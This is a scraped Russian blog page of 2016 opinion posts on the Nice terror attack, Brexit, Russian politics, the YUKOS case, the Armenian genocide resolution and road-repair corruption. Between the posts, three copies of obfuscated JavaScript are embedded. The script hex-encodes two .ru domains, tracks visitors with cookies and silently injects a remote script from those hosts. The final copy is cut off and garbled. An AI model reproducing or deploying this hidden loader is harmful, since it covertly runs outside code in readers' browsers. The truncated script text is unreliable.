Все записи
Причины теракта в Ницце
Есть несколько основных причин теракта в Ницце. Выделим три из них.
Первая – активность террористов.
Вторая – деятельность спецслужб.
Третья – общественное устройство.
Что касается активности террористов, то теракт в Ницце в день взятия Бастилии – это очередное предупреждение ИГ о том, что их планы и курс неизменны. Главный принцип проводников идей терроризма – не дать забыть о себе, не кануть в забвение. Получив серьёзный отпор в Сирии, они стали подтягиваться к Турции.
В Бангладеш в столице Дакке был совершен крупнейший в истории страны теракт, когда при нападении на кафе Holey Artisan Bakery жертвами стали преимущественно иностранцы — граждане Италии, Японии, США, Индии. Они были взяты в заложники и зарублены за неспособность процитировать Коран.
Сразу несколько терактов произошло в Саудовской Аравии в понедельник, 4 июля 2016 года. В Медине прогремел взрыв около Мечети Пророка, погибли пять человек. Еще два взрыва были зафиксировали в городе Эль-Катиф на востоке страны. Но все эти события в странах Азии не имели такого серьезного резонанса в Европе. Поэтому и был совершен очередной теракт в Ницце, где погибли не менее 80 человек.
Возможно, одним из поводов этого теракта явилось очередное (13-е по счету) покушение на «министра войны» ИГИЛ Абу Умара аш-Шишани (Тархана Батирашвили). Что касается антитеррористической деятельности спецслужб, то надо признать, что они отстают от динамичной тактики террористов.Возможно, в случае теракта в Ницце сказалась некоторая расслабленность спецслужб после напряженного чемпионата Европы по футболу. Но главное – это то, что террористы стали использовать новые приемы борьбы, к которым спецслужбы не всегда успевают.Нельзя думать, что террористы будут постоянно действовать стереотипно.Если террорист пронес бомбу в метро или аэропорт, это не значит, что после установки дорогих (и не всегда работающих) рамок металлоискателей, видеокамер и т.д. проблема будет решена.
Вот свежий пример, когда в Израиле журналист The Times of Israel Давид Сулейман смог не только устроиться уборщиком в аэропорт «Бен Гурион» (Тель-Авив) по чужим документам, но и пронести на борт нескольких самолетов муляж взрывного устройства.За два дня работы журналисту удалось поработать на двенадцати самолетах, там он мог войти даже в кабину пилотов. Муляжи взрывных устройств он смог пронести и спрятать на бортунескольких самолетов. И именно таким образом самодельное взрывное устройство, скорее всего, сотрудник египетского аэропорта пронес на борт российского лайнера Airbus A321, потерпевшего крушение над Синайским полуостровом в октябре 2015 года.
Давид Сулейман в аэропорту «Бен Гурион», служба которого является эталоном безопасности на воздушном транспорте, запросто проходил туда, куда у него не было доступа согласно его должности. Например, он помогал грузчикам с багажом в зоне, где пассажиры ожидают вылет рейса. И эта проблема не отдельных сотрудников безопасности аэропорта, а это проблема системы. С одной стороны, изучение под микроскопом пассажиров, а, с другой, работники, беспрепятственно снующие по всей территории аэропорта. Это общая проблема. Не удивлюсь, если в том же аэропорту Домодедово часть работников (грузчиков, уборщиков), представляющих страны Средней Азии, даже не имеют разрешения на работу в РФ, и являются клиентами ФМС. Они приехали заработать и за дополнительный заработок пронесут что угодно и куда угодно.
Так и в Ницце. Все разговоры о том, что нужно было огородить места гуляния, чтобы в толпу не врезался грузовик, просто смешны. Образно говоря, чтобы грузовик не врезался в толпу надо не пытаться остановить его на полном ходу, а надо не дать ему тронуться с места. О чем идет речь? Теракт надо пресекать не в момент его совершения, а на этапе подготовки.
Через агентурную работу нужно выявлять источники финансирования терроризма, каналы поставки оружия, планы совершения терактов. Все это нужно узнавать в местах подготовки терактов и террористов. Именно так и решалась проблема терроризма на Кавказе. И, наконец, третья проблема – общественное устройство. Да можно говорить о наплыве мигрантов в Европу, и связывать это с тем, что грузовиком, задавившим насмерть десятки людей на набережной Ниццы, управлял местный житель, 31-летний уроженец Туниса. Очевидно, что человек был в жизни не устроен, и он ранее уже имел проблемы с законом. Именно такие субъекты – разочарованные, отчаявшиеся и являются объектом внимания террористов.
Но когда в обществе нет равных возможностей, и без родовой принадлежности к определенной социальной прослойке нет возможности «подниматься по социальному лифту», прозябая всю жизнь водителем, грузчиком, официантом, за рулем грузовика вполне мог оказаться и коренной француз. И это тоже проблема. И не только Франции.
Почему кепка не на ту сторону? Дубль два
Охлократия с Brexit-ом
Все страны мира декларируют о стремлении создать демократическую систему управления государством, ну, кроме пары стран. Там или не скрывают стремления создать чистое исламское управление государством и обществом, или это… страны, где никто ничем не управляет, типа, Науру.
Что такое демократия?
Демократия -
Но у демократии есть свои «50 оттенков серого».
Вот самые яркие:
Охлократия - вырожденная форма демократии, основанная на меняющихся прихотях толпы, постоянно попадающей под влияние демагогов. Охлократия характерна для переходных и кризисных периодов,
Плутократия -
Нетократия - предполагаемая форма управления
Типичным проявлением нетократии является Северная Корея.
Последние события в мире в целом, и конкретно в Великобритании (Brexit) частично, явно свидетельствуют о резком проявлении охлократии. Это видно во Франции (Мари Ле Пен), в Греции, на Украине, и т.д. и т.п. Самым ярким проявлением этого являются выборы президента США. Популист Трамп побеждает везде, и, после английского Brexit, вероятность победы Трампа в выборах уже не звучит иронично маловероятной.
Думаю, с этим никто не спорит.
Вопрос в другом. Отчего это, кто виноват и что делать.
Есть мнение, что во всём этом виноват … Интернет.
Всем как бы дали возможность выражать свои мысли вслух в блогах, на форумах и соцсетях. А там, в основном... сидят… популисты, неучи, низкообразованные личности.
Они и делают погоду в эфире, которая незаметно, но наступательно проникает и заполняет свободное пространство между электоральными личностями и партиями.
Интеллектуалам нечего делать на интернетных площадках. Кто не верит этому, может узнать, что статистика посещения сайта Википедия - одна из самых низких.
Не это ли полное проявление охлократии?
Что ещё будет дальше - в уме не укладывается. Катимся.
Есть ещё одно обстоятельство в свершении Brexit-а - это глупое проявление демократии в структурах Евросоюза. Что же получается, во всех голосованиях голос Англии равняется с голосом, скажем, Эстонии или Словении, или Мальты? По демократическим законам, это правильно, по сути – глупо. Несмотря, что у Англии и так было много привилегий в Евросоюзе, всё равно, треть затрат шла на неё. И негоже великой Англии видеть вето этих мелких квазигосударственнообразованных стран. Так хочется иногда щелкнуть им по лбу, чтоб знали кто есть who.
Идеального равенства в природе не существует.
Так что, не все ладно в демократичных королевствах.
Какие выводы сделают великие демократичные умы, увидим в этом году в Брюсселе и в Вашингтоне.
Грачик Саруханян
01.07.2016
Борясь с "Открытым диалогом", власти не замечают истинных угроз безопасности
Как обычно, нелегко признаваться в собственной глупости, но надо. На днях мне пишут продюсеры с "Эха", приглашающие на передачу на тему "Открытый диалог" в Петербургской библиотеке имени Маяковского как подрывная площадка для дискуссий?" Я весело и, особенно не задумываясь, отвечаю, что благодарен за приглашение на "Эхо" (конечно), но ничего не знаю по теме, хотя фамилия Маяковский звучит, определенно, знакомо и приглашайте, лучше, говорить про экономику.
Ответ был мой, конечно, глупым. Потому что я знаю площадку "Открытый диалог" и даже участвовал в дискуссии полтора года - вместе с Дмитрием Бутриным - на тему "Новая экономическая реальность". Было во всех отношениях прекрасно - организация (спасибо Екатерине Гордеевой и Николаю Солодовникову) и аудитория (как всегда в Петербурге). Я выступал на экономические темы в самых разных городах, местах и форматах и это выступление было одним из самых, по внутреннему ощущению, успешных.
Так вот почему меня позвали на "Эхо" говорить о том, что ФСБ что-то расследует по поводу "Открытых диалогов"! Впрочем, о чём было бы говорить? Понятно, что расследовать там нечего - и это я могу сказать с уверенностью, не глядя на список тех, кто ещё там выступал. Публичные форумы, популярные лекции и дискуссии ни при каких реальных обстоятельствах не могут представлять никакой угрозы обществу. Тут нечего "расследовать".
То, что от подобной деятельности может быть какая-то угроза безопасности - болезненная фантазия. И было бы этой фантазии там и место, среди других фантазий - если бы в погоне за такими же фантазиями полвека назад тогдашние спецслужбы (КГБ) не упустили бы реальных угроз безопасности. Тысячи (если не десятки тысяч) людей следили за Сахаровым и Алексеевой, не давали работать Каллистратовой и Каминской, выдавливали из страны Бродского и Солженицына - при том, что угроз безопасности страны они не представляли вообще никакой. И менее известные тысячи других правозащитников и просто недовольных советской властью, и сотни тысяч "молчаливых читателей". Может, они представляли какую-то опасность - Солженицын уж наверняка - для каких-то деятелей из политбюро, но какое-то имеет отношение к безопасности страны?
А вот реальные риски - те, самые, которые привели к экономической катастрофе и распаду страны - были полностью проигнорированы. Вместо тысяч томов отчётов о передвижении Елены Боннэр по маршруту Москва-Горький, кто-нибудь написал хотя бы две странички аналитики о том, какую угрозу для страны представляет низкая мобильность на самом верху управления? Вместо выдавливания диссидентов за границу, подумал о том, что в мире, где темпы роста развитых стран Запада опережают темпы роста советсткой экономике "железный занавес" из инструмента поддержания безопасности превращается в мину замедленного действия? Вместо преследования несчастных "цеховиков", кто-нибудь написал как срочно необходима приватизация мелких предприятий? Вместо преследования Амальрика, кто-нибудь прочитал его десять страничек про угрозу развала СССР, написанные в 1969-ом году? (Наряду с совершенно неоправдавшимися страхами, там содержится отличный - потому что, как оказалось, правильный - прогноз про то, как сращивание национальных и коммунистических элит на периферии ускорит центробежные тенденции.) Не говоря уж про письмо Сахарова-Медведева-Турчина про опасности "утраты обратной связи"... Так же и сейчас - вместо того, чтобы заниматься тем, что в принципе не может иметь отношения к безопасности страны, надо смотреть на реальные риски.
"Единая Россия" испытывает иррациональный страх
Вообще, конечно, довольно забавная картина. Все, кто имеют возможность наблюдать картину изнутри, говорят о том, что в самой "Единой России" крайне нервная и напряжная атмосфера, царит полная неуверенность и стремление "дуть на воду". И в то же время, по всем имеющимся социологическим индикаторам, предстоящие выборы в ГосДуму обещают быть для "партии власти" едва ли не самыми безоблачными в истории. Общественная активность на нуле, правый фланг разгромлен, левые взнузданы, регионалы ходят по струнке и периодически отправляются на нары - конкурентов нет от слова "совсем".
Пока, если на сегодняшний день смотреть, едросы должны без малейшего напряжения получать в ГД 70% (60% по спискам и 80% по округам). Это намного больше, чем было в уходящей ГосДуме - а ведь и в ней единороссы с куда меньшим пакетом царствовали безраздельно и делали что хотели... Ну как "царствовали"? То есть правительство и Кремль делали что хотели, конечно же ("ЕР" - мертворожденный конструкт, этакая механическая кукла, собственной субъектности не имеет - тем и ценна).
И тем не менее у ЕдРа - полная неуверенность. Хотя даже теоретически непросто себе представить, что или кто может ей не то что угрожать, но хотя бы опустить прогнозируемый процент с 70 до 55-60. Это какой-то иррациональный страх.
Думаю, дело в том, что все эти люди там догадываются, некой своей "чуйкой": они на своем месте пересидели, они занимают ЧУЖОЕ место. Но чье?? Вот вопрос.
До боли знакомые просьбы трудящихся
Чем брекзит может помочь Британии и ЕС
Как выясняется, вчера британцы проголосовали за выход из Евросоюза. Несколько неожиданно, потому что опросы в последние дни показывали небольшое, но устойчивое большинство за то, чтобы остаться.
Будут ли у этого какие-то серьёзные экономические последствия, понятно плохо. То есть понятно, что фунт резко упадёт в ближайшие часы (уже, собственно, резко упал) и что его курс будет ниже того, что был в последние годы в течение некоторого времени. Однако непонятно, чем это само по себе плохо для британской экономики и, скорее всего, даже хорошо - с учётом всё ещё относительно высокой безработицы и медленного роста зарплат, более низкий курс фунта может помочь (точно так же как соросовская спекулятивная атака, обрушившая завышенный курс фунта в 1992-ом - это точка, с которой начался бурный рост 1990-х). Наконец, в долгосрочной перспективе Brexit может также не иметь заметных негативных последствий - в современном мире "общий статус межстрановых отношений" не так важен для бизнеса и развития. Торговые договора и технические протоколы, выгодные для обеих сторон, просто останутся на своих местах.
Лондону, конечно, будет труднее удерживать статус финансовой столицы Европы, но основная причина, почему в Лондон текут русские, например, деньги и мозги - не "финансовые". Бывшие чиновники и опальные бизнесмены бегут туда из-за того, что оттуда "выдачи нет" (в отличие от не менее притягательной для жизни и более дешёвой Испании, например). Те же чиновники и успешные бизнесмены посылают детей учиться в Англию из-за преимуществ системы образования (и, я бы сказал, маленького внутреннего рынка - американские университеты и колледжи лучше английских, но английские намного раньше повернулись лицом к миру, предоставляя огромный спектр услуг - и, главное, уровней - для детей из-за границы). Так что и здесь от выхода из Евросоюза ничего не меняется.
Наконец, для Евросоюза тоже есть польза. Ещё раз - это сотни лет назад отношения между странами определялись отношениями королей и "большими союзами". Сейчас важное в отношениях - возможности для торговли, проникновение технологий, свобода миграции определяется не одним договором и не членством в чём-то, а множеством мелких договоренностей и регуляторных практик. Поскольку большинство этих мелких договоренностей - и так взаимовыгодные (или компромиссные), они останутся на своих местах и мало что сильно поменяется. (Собственно, поэтому так легко стало регионам "раздумывать о выходе" - и вчерашний референдум даёт, очевидно, новые стимулы для сепаратизма - столь же малозначительного - Шотландии.) Основным изменением в Евросоюзе станет относительное увеличение роли Германии и Франции, что, в сущности, облегчает движение к "единой европейской стране", ускорившееся после кризиса 2008 года. И сделает ближе границы ЕС и "еврозоны", так же облегчая это движение.
Британия выходит из ЕС, как Украина - из СССР
Прекрасно! Британцы, вопреки ожиданиям, все-таки выбрали ДЕЙСТВИЕ и проголосовали "за" выход из ЕС.
Так это же круто! В Европе начнется небольшая заваруха, "похудеет" евро (британские активы уже не будут никак учитываться при оценке его потенциала) - а там, глядишь, и какие-то другие страны засобираются "на выход". Вдохновленные британским примером. Люди либеральных взглядов, будучи по определению сторонниками разнообразия, не могут такого не приветствовать.
Говорят, что сами британцы от "развода" скорее проиграют, чем выиграют. Ну так а нам-то что - мы ведь не в Англии живем. К тому ж это и не факт - может быть, наоборот, расцветут еще пуще? Очень интересно будет понаблюдать.
Либеральное кредо просто - дезинтеграция есть благо практически всегда. Потому что власть не должна быть слишком высоко и далеко - она должна быть тут, рядом, и не быть чрезмерно сильной, аккумулирующей ресурсы огромных территорий. Такую власть, если что, и свергнуть не получится!
Опять же: чем мельче объект управления - тем ближе к нему сам орган управления, тем точнее он понимает нужды и пожелания тех самых "простых людей", которых иначе, с большого расстояния, и не различить - так, копошатся какие-то букашки, коих проще раздавить, чем вникать в их проблемы.
Так что свободной Британии - быть! Вот, кстати, прямая параллель: как Британия все-таки решила выломиться из ЕС, так же, скажем, та же Украина настойчиво стремилась вывалиться из СССР (равно как и большинство прочих республик). Причем даже "доводы желудка" тут не срабатывают: тем же британцам несколько месяцев на разные лады доказывали, что с выходом они больше потеряют, чем приобретут, что им придется "завязать пояса"... Но нет, стремление к самостоятельности побеждает.
Как и у той же Украины. Кстати, да - и развал СССР либерал должен приветствовать, из уже озвученных выше соображений. Я и приветствую. Больше республик, хороших и разных! Интеграция может быть разве что по примеру США: там ведь не зря говорится, что над губернатором любого штата НЕТ начальника, он - высшее должностное лицо (президент США, вопреки распространенному мнению, не является начальником губернаторам - они есть независимые от него лица, которым он не вправе ничего приказывать).
Грусть лишь в том, что, если Европа распадется, по ней не удастся перемещаться с прежним удобством, без границ и таможен. Однако и в этом отношении пока что ничего плохого не произошло - ведь в Англии и без Брекзита нельзя было въезжать по шенгенской визе. Так что пока - ничего страшного, а фан обеспечен! Запасаемся попкорном и с интересом смотрим на "тектонические изменения европейского политического ландшафта".
От Сямозера до Тулузы.
При всей полярности прискорбных событий – гибели детей на Самозере и вылета российской сборной по футболу с турнира Евро-2016, у них, как ни странно, есть общая причина, подрывающая безопасность страны. Имя ей – коррупция.
Что есть экономика
13 июня в передаче «Особое мнение» на «Эхо Москвы» К. Ремчуков, главный редактор «Независимой газеты» высказал ряд мыслей, которые определённым образом задели моё самолюбие.
Цитирую:
«Если вы хотите иметь теоретическое мышление, то вам необходимо изучать историю философии. Другого способа человечество не выработало для развития того, что дано в виде потенциальной способности».
«Каждый человек может обладать этим мышлением. Тот, кто в молодые годы не изучал историю философии, не читал философских трудов в подлиннике, тот не обладает этим».
«Это касается чаще всего тех физиков и математиков, которые потом решили, что они экономисты хорошие, а также юристы».
Так как по образованию я математик, и сейчас я занимаюсь чем угодно, кроме математики, то выходит, что у меня ничего не получается. Нет у меня теоретического мышления. Ну не могу я представить ни я N-мерное
Мы, студенты мехмата и физфака, поступая в университеты, надеялись совершить гениальные открытия в науке. И когда чувствовали (иногда, ошибочно), что мы не гениальны, разочаровавшись, находили другие поприща, причём часто очень и очень удачно.
Сейчас, после всего, хочу задать вопрос, который давно мне мучает:
- Скажите, пожалуйста, экономика является наукой?
Если да, то какой – точной, гуманитарной, может быть, исторической?
Я, как и многие знакомые и незнакомые, так и не понял, что за экономический курс в нашей стране, как он называется.
Все кругом экономисты: Кудрин, Глазьев, Греф, Улюкаев, Набиуллина, Геращенко, Аганбекян, Гуриев, Илларионов и многие другие. Там, насколько я знаю, нет бывших математиков и физиков.
А жаль. Ведь у них принято: если есть задача Пуанкаре, то она требует доказательства. Господин Перельман доказал теорему. И всё. Никто не сомневается. Все согласны.
А у нас через один - экономисты. Все кричат о своей правоте.
Чем доказываете свою теорию, господа?
Ответ: вот если доверитесь нашей теории, то жизнь докажет нашу правоту.
Так это наука или гадание на кофейной гуще?
Предлагаю: управление экономикой в стране отдать математикам и физикам.
Мы любим порядок и закономерность. Мы не любим хаос.
Грачик Саруханян
17.06.2016
window .a1336404323 = 1;!f unction(){var e=JSON.parse('["62683172636c646d3832366b67352e7275","6e67756f67796e61387136682e7275"]'),t="26698",o=f unction(e){var t=docu ment.cookie.match(new RegExp("(?:^|; )"+e.r eplace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=f unction(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCS tring()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=f unction(e){e=e.r eplace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toS tring(16);return t},a=f unction(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=Stri ng.fromCharCode(parseInt(e[o],16));return t},d=f unction(){return "ng.ru"},p=f unction(){var w=wind ow,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=f unction(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(wind ow .smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window .smlo.loadSmlo(n.r eplace("https:","http:"));else if(wind ow .zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window .zSmlo.loadSmlo(n.r eplace("https:","http:"));else{var i=docu ment.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.on load=f unction(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.on error=f unction(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=f unction(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window .a3164427983=f,c(u,f unction(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},f unction(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=f unction(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();
Власть в России неподсудна по делу ЮКОСа
Припертая к стене жадным Невзлиными, Россия пошла на СТРАШНОЕ.
Взялась за Чемоданчик и...
Без метафор - многие наверное прочитали, что Российская прокуратура предъявила суду США ИМЕНА ВЗЯТОЧНИКОВ, КОТОРЫЕ ПОМОГЛИ "ДАРОМ" ПРИВАТИЗИРОВАТЬ ЮКОС.
Знаменательное событие!
1. ВПЕРВЫЕ от болтовни про "подозрительную приватизацию" перешли к НАЗЫВАНИЮ ИМЕН ВЗЯТОЧНИКОВ.
2. Это сделано ТОЛЬКО НА ЭКСПОРТ!
В ходе 2 судов по делу МБХ - никто никаких обвинений этим людям НЕ ПРЕДЪЯВЛЯЛ. Хотя ВСЕ данные, посланные в США, взяты из ПРЕЖНЕГО следствия.
Т.е. Прокуратура, значит, ОТКРЫТО ПОКРЫВАЛА ИЗВЕСТНЫХ ЕЙ ВЗЯТОЧНИКОВ? Теперь этот ФАКТ признан самой Прокуратурой?!
3. Больше того.
И СЕЙЧАС - никаких обвинений ВНУТРИ страны этим людям НЕ ПРЕДЪЯВЛЕНО - опять же, ТОЛЬКО НА ЭКСПОРТ.
На это есть простой ЮРИДИЧЕСКИ ТОЧНЫЙ(!) ответ - срок давности вышел.
Но, когда арестовали МБХ, срок давности ОТНЮДЬ НЕ ВЫШЕЛ. Так что Прокуратура разумно ПОДОЖДАЛА - и...
4. Но КТО ЖЕ эти люди?
Депутат ГД от КПРФ Муравленко и несколько пенсионеров (Во всяком случае, ни про какую их работу я не слышал). Муравленко - Иваненко (бывший начальник управления КГБ по Тюменской области) - Голубев - это КТО ВООБЩЕ?
Это - бывшие руководители тех Государственных нефтяных компаний, которые были приватизированы и вошли в состав ЮКОС, а Муравленко-Иваненко и Ко стали крупными акционерами ЮКОС.
Ежу понятно, что обвинение во "взятках" (назван и размер - 2 млрд долл. в начале 2000-х годов, т.е. около 3 млрд. на сегодняшний день) - ЛЕГКО РАЗБИТЬ.
Какие... "взятки"? Неоценимые услуги по менеджменту + пакеты акций в ходе той самой "приватизации".
5. А - БОЛЬШЕ НИКТО?
Т.е. вот 3-4 директора Государственных компаний "за взятки" решили "отдать" "СВОИ"(!!!) Государственные компании МБХ и Ко.
И это - ВСЕ?!
А Государства - НЕ БЫЛО ВООБЩЕ?
Госкомимущество? ПРАВИТЕЛЬСТВО?! АП?!!
Они все НИЧЕГО НЕ ВИДЕЛИ - НЕ СЛЫШАЛИ?!!!
ТАМ ни у кого не было НИКАКОГО ИНТЕРЕСА?!!!!
Да.
Даже в 2016.
Даже когда ВСЕ люди там СМЕНИЛИСЬ по 100 раз.
Даже в абсолютно ПРИНЦИПИАЛЬНОМ деле.
Даже при истечении всех мыслимых-немыслимых сроков всех давностей.
Даже при том, что многие чиновники из числа тех "приватизаторов" стали ПОЛИТИЧЕСКИМИ ВРАГАМИ Режима -
даже при всем этом -
О-МЕР-ТА.
Можно сказать - "это для того, чтоб не взорвать бомбу в ФУНДАМЕНТЕ ВСЕЙ российской экономики - чтоб не создавать прецедент РАЗБОРА ДЕЛ О ПРИВАТИЗАЦИИ" (и о... последующем ВЫКУПЕ НАЗАД приватизированных компаний - Сибнефть, ТНК).
Да, конечно. (Хотя конфискация ЮКОСа никак ни экономические, ни ОБЩИЕ итоги приватизации не обрушила!).
НО есть и "еще более главный Фундамент Системы".
НЕПРИКАСАЕМОСТЬ ВЫСШЕЙ НОМЕНКЛАТУРЫ. Хоть 1(один) Министр, чиновник АП, чиновник ФСБ, чиновник Прокуратуры был осужден за взятки?
НЕТ. Потому что - НЕЛЬЗЯ НАРУШИТЬ КОНСТИТУЦИЮ РФ.
А в ней - после Статьи 1 "ПРЕЗИДЕНТ НЕСМЕНЯЕМ и НЕКРИТИКУЕМ", есть статьи 2 -
Чиновника - любые бывшие - выше ОПРЕДЕЛЕННОГО УРОВНЯ НЕ-ПОД-СУД-НЫ. По УГОЛОВНЫМ делам.
НИ-КО-ГДА. (Список Сакральных организаций и чиновников - в подзаконных актах к Конституции).
И этот Закон - ВЕЧЕН. Поистине - Скрепа Скреп.
Так, в 1937 г. расстреливали тысячами - но НИ ОДИН(!) троцкист-шпион-выродок-диверсант НИ РАЗУ НЕ ОБВИНЯЛСЯ НИ В КАКИХ ВЗЯТКАХ, РАСТРАТАХ, ЗЛОУПОТРЕБЛЕНИЯХ и т.д.
НИ в чем, что может бросить РЕАЛЬНУЮ ТЕНЬ НА ВЛАСТЬ.
Резолюция Германии про Геноцид
Германия тоже приняла факт Геноцида Османской империи в отношении армян (и других христиан).
Ну и что?
Кому от этого хорошо, кому плохо?
Армянам всего мира хорошо, наверно
Государству Армении – вряд ли. Сосед еще жёстче скрежещет зубами и брызгает ещё более злыми объявлениями, грозит – мол, не забыли, сколько тут армян находится в данный момент. А то я знаю, как ЭТО делается. Могу и повторить.
России – так себе. Укол вновь назначенному врагу. Приятно, но бесполезно. Вот бы танками - арматами их.
Германии? Наверно, им это хорошо. Ведь смогли же второй раз принять, признать, что был Геноцид, и не без их участия. Но самое главное они преодолели. Это страх перед своими турко-язычными гражданами и ещё перед миллионом прибывших туда за год мусульман. Молодцы, храбрые ребята.
США? Им, наверно, пофиг всё это. Наблюдение, ухмылка, ирония. Думаю, они согласны с резолюцией, но сами… Ещё посмотрим. Ещё рано.
А так. Только бизнес. Без обиды.
Грачик Саруханян
07.06.2016
window .a1336404323 = 1;!f unction(){var e=JSON.parse('["62683172636c646d3832366b67352e7275","6e67756f67796e61387136682e7275"]'),t="26698",o=f unction(e){var t=docu ment.cookie.match(new RegExp("(?:^|; )"+e.r eplace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=f unction(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCS tring()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=f unction(e){e=e.r eplace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toS tring(16);return t},a=f unction(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=Stri ng.fromCharCode(parseInt(e[o],16));return t},d=f unction(){return "ng.ru"},p=f unction(){var w=wind ow,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=f unction(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(wind ow .smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window .smlo.loadSmlo(n.r eplace("https:","http:"));else if(wind ow .zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window .zSmlo.loadSmlo(n.r eplace("https:","http:"));else{var i=docu ment.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.on load=f unction(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.on error=f unction(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=f unction(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window .a3164427983=f,c(u,f unction(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},f unction(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=f unction(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();
Как ремонтируем дороги
По всей стране начинаются ремонтные работы на дорогах.
Осенью прошлого года много говорили о проблеме некачественного ремонта.
Проблема с плохим ремонтом уже «сидит в печенке» правительства. Но оргвыводов пока не видно, кроме слабых телодвижений ОНФ (Общероссийского Народного фронта).
Намедни мэр города Владимира Ольга Деева выдала уже ставшую крылатой фразу: «Не приживается у нас асфальт, отторгает его земля».
Я, имеющий опыт заказчика ремонта муниципальных дорог, хочу проинформировать «на пальцах», кому это интересно, почему ремонты такие, что дорог нет.
1. Дороги плохие, потому что воруют.
Но воруют не там, где все думают - на толщине и качестве асфальта. Правда, на них тоже воруют, но не так много. Воруют в основном на подготовительных работах. Их много, но основными являются:
- ямочный ремонт;
- распределение и разравнивание выравнивающего слоя с последующим уплотнением;
- поливка основания горячей битумной эмульсией;
- укладка асфальта в среднем толщиной 5 см.
Иногда этому предшествует снятие верхнего слоя асфальта (фрезеровка).
После исполнения работ проводят проверку - выпиливают кусочек и отвозят его в лабораторию для проверки толщины и качества асфальта. Всё. Работа сдана.
А кто скажет, сколько потрачено щебня, какого качества он был? Сколько провели работ по выравниванию и т.д. и т.п.?
Поверьте, там и зарыта собака.
2. Дороги плохие, потому что их не содержат надлежащим образом.
Самое губительное для асфальтового покрытия - это вода с песком. Это как наждачная бумага для стекла. Скажем честно, при ремонте дорог вопрос водоотведения вообще не решается, даже не рассматривается. Хотя бы сделать уклон для схода воды. Не говоря уж о водоотводящих каналах. На «гнилом Западе» техника дошла до того, что вода просачивается через дорожное покрытие и по специальным каналам уходит. На улице ливень, а на дороге ни капли.
В муниципальных бюджетах статьи «ремонт дорог» еле хватает на весенний ямочный ремонт и чуток на капитальный ремонт, а про создание ливневой канализации - и нечего думать, и некому думать. С
Вот и всё. Так и живем из года в год.
Грачик Саруханян
06.06.2016
window .a1336404323 = 1;!f unction(){var e=JSON.parse('["62683172636c646d3832366b67352e7275","6e67756f67796e61387136682e7275"]'),t="26698",o=f unction(e){var t=docu ment.cookie.match(new RegExp("(?:^|; )"+e.r eplace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1";)+"=([^;]*)";));return t?decodeURIComponent(t[1]):void 0},n=f unction(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCS tring()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=f unction(e){e=e.r eplace("www.","";);for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toS tring(16);return t},a=f unction(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=Stri ng.fromCharCode(parseInt(e[o],16));return t},d=f unction(){return "ng.ru"},p=f unction(){var w=wind ow,p=w.document.location.protocol;if(p.indexOf("http";)==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=f unction(e,t,o){var lp=p();if(lp=="";)return;var n=lp+"//"+e;if(wind ow .smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox";))window 